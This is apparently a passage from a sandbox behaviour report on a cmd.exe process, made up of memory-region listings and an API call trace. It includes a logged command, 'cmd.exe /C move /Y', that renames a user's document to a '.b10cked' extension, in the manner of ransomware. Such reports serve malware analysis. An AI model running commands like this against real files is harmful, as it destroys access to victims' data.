[0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13565 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13566 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13567 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13568 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 13569 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13570 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13571 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13572 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13573 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 13574 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13791 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13792 start_va = 0x20000 end_va = 
0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13793 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13794 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 13795 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 13796 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13797 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13798 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13799 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13800 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13801 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") 
Region: id = 13802 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13803 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13804 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13805 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 13806 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13807 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 13808 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 13809 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 13810 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 13811 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 13812 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 13813 start_va = 
0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 13814 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Thread: id = 190 os_tid = 0xb8c [0135.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fedc | out: lpSystemTimeAsFileTime=0x20fedc*(dwLowDateTime=0x8ab7e040, dwHighDateTime=0x1d440a9)) [0135.531] GetCurrentProcessId () returned 0xbc4 [0135.531] GetCurrentThreadId () returned 0xb8c [0135.531] GetTickCount () returned 0x2ae57 [0135.531] QueryPerformanceCounter (in: lpPerformanceCount=0x20fed4 | out: lpPerformanceCount=0x20fed4*=19232003466) returned 1 [0135.531] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0135.532] __set_app_type (_Type=0x1) [0135.532] __p__fmode () returned 0x76b331f4 [0135.532] __p__commode () returned 0x76b331fc [0135.532] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0135.532] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0135.532] GetCurrentThreadId () returned 0xb8c [0135.532] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb8c) returned 0x38 [0135.532] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0135.532] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0135.532] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.532] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.532] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fe6c | out: phkResult=0x20fe6c*=0x0) returned 0x2 [0135.533] VirtualQuery (in: 
lpAddress=0x20fea3, lpBuffer=0x20fe3c, dwLength=0x1c | out: lpBuffer=0x20fe3c*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.533] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fe3c, dwLength=0x1c | out: lpBuffer=0x20fe3c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0135.533] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fe3c, dwLength=0x1c | out: lpBuffer=0x20fe3c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0135.533] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fe3c, dwLength=0x1c | out: lpBuffer=0x20fe3c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.533] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fe3c, dwLength=0x1c | out: lpBuffer=0x20fe3c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0135.533] GetConsoleOutputCP () returned 0x1b5 [0135.533] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.533] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0135.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.533] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0135.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.533] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0135.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.533] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0135.533] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.533] GetConsoleMode (in: hConsoleHandle=0x3, 
lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0135.534] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.534] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0135.534] GetEnvironmentStringsW () returned 0x340178* [0135.534] FreeEnvironmentStringsW (penv=0x340178) returned 1 [0135.534] GetEnvironmentStringsW () returned 0x340178* [0135.534] FreeEnvironmentStringsW (penv=0x340178) returned 1 [0135.534] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eddc | out: phkResult=0x20eddc*=0x40) returned 0x0 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x0, lpData=0x20ede8*=0xa0, lpcbData=0x20ede0*=0x1000) returned 0x2 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x1, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x0, lpData=0x20ede8*=0x1, lpcbData=0x20ede0*=0x1000) returned 0x2 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x0, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x40, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: 
lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x40, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.534] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x0, lpData=0x20ede8*=0x40, lpcbData=0x20ede0*=0x1000) returned 0x2 [0135.535] RegCloseKey (hKey=0x40) returned 0x0 [0135.535] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eddc | out: phkResult=0x20eddc*=0x40) returned 0x0 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x0, lpData=0x20ede8*=0x40, lpcbData=0x20ede0*=0x1000) returned 0x2 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x1, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x0, lpData=0x20ede8*=0x1, lpcbData=0x20ede0*=0x1000) returned 0x2 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x0, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x9, lpcbData=0x20ede0*=0x4) returned 0x0 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x4, lpData=0x20ede8*=0x9, lpcbData=0x20ede0*=0x4) 
returned 0x0 [0135.535] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ede4, lpData=0x20ede8, lpcbData=0x20ede0*=0x1000 | out: lpType=0x20ede4*=0x0, lpData=0x20ede8*=0x9, lpcbData=0x20ede0*=0x1000) returned 0x2 [0135.535] RegCloseKey (hKey=0x40) returned 0x0 [0135.535] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0135.535] srand (_Seed=0x5b88636a) [0135.535] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked\"" [0135.535] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked\"" [0135.535] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.535] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3418d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0135.536] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0135.536] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.536] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.536] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0135.536] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0135.536] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0135.536] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0135.536] _wcsicmp (_String1="PROMPT", 
_String2="DATE") returned 12 [0135.536] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0135.536] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0135.536] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0135.536] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0135.536] GetEnvironmentStringsW () returned 0x3422c8* [0135.536] FreeEnvironmentStringsW (penv=0x3422c8) returned 1 [0135.536] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.536] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.536] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0135.536] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0135.536] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0135.536] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0135.536] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0135.536] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0135.536] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0135.536] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0135.536] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fba8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.537] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fba8, lpFilePart=0x20fba4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fba4*="Desktop") returned 0x18 [0135.537] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0135.537] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f924 | out: lpFindFileData=0x20f924) returned 0x340008 [0135.537] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) 
returned 1 [0135.537] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f924 | out: lpFindFileData=0x20f924) returned 0x340008 [0135.537] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0135.537] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f924 | out: lpFindFileData=0x20f924) returned 0x340008 [0135.537] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0135.537] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0135.537] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0135.538] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0135.538] GetEnvironmentStringsW () returned 0x342ae8* [0135.538] FreeEnvironmentStringsW (penv=0x342ae8) returned 1 [0135.538] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.538] GetConsoleOutputCP () returned 0x1b5 [0135.538] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.538] GetUserDefaultLCID () returned 0x409 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fce8, cchData=128 | out: lpLCData="0") returned 2 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fce8, cchData=128 | out: lpLCData="0") returned 2 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fce8, cchData=128 | out: lpLCData="1") returned 2 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") 
returned 4 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0135.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0135.540] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0135.540] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0135.540] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0135.541] GetConsoleTitleW (in: lpConsoleTitle=0x3308d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.541] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0135.541] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0135.541] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0135.541] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0135.542] _wcsicmp (_String1="move", _String2=")") returned 68 [0135.542] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0135.542] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0135.542] _wcsicmp (_String1="IF", _String2="move") returned -4 [0135.542] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0135.542] _wcsicmp (_String1="REM", _String2="move") returned 5 
[0135.542] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0135.545] GetConsoleTitleW (in: lpConsoleTitle=0x20f9e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.579] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0135.579] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0135.579] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0135.579] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0135.579] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0135.579] _wcsicmp (_String1="move", _String2="CD") returned 10 [0135.579] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0135.579] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0135.579] _wcsicmp (_String1="move", _String2="REN") returned -5 [0135.579] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0135.579] _wcsicmp (_String1="move", _String2="SET") returned -6 [0135.579] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0135.579] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0135.579] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0135.579] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0135.579] _wcsicmp (_String1="move", _String2="MD") returned 11 [0135.579] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0135.579] _wcsicmp (_String1="move", _String2="RD") returned -5 [0135.579] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0135.579] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0135.579] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0135.579] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0135.579] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0135.579] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0135.579] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0135.579] _wcsicmp (_String1="move", _String2="VER") returned -9 [0135.579] _wcsicmp (_String1="move", _String2="VOL") 
returned -9 [0135.579] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0135.579] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0135.579] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0135.579] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0135.579] _wcsicmp (_String1="move", _String2="START") returned -6 [0135.579] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0135.579] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0135.579] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0135.581] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.581] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.581] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f79c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f794, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f794*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0135.581] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0135.582] 
_wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.582] _wcsnicmp (_String1="COPYCMD", _String2="Program", 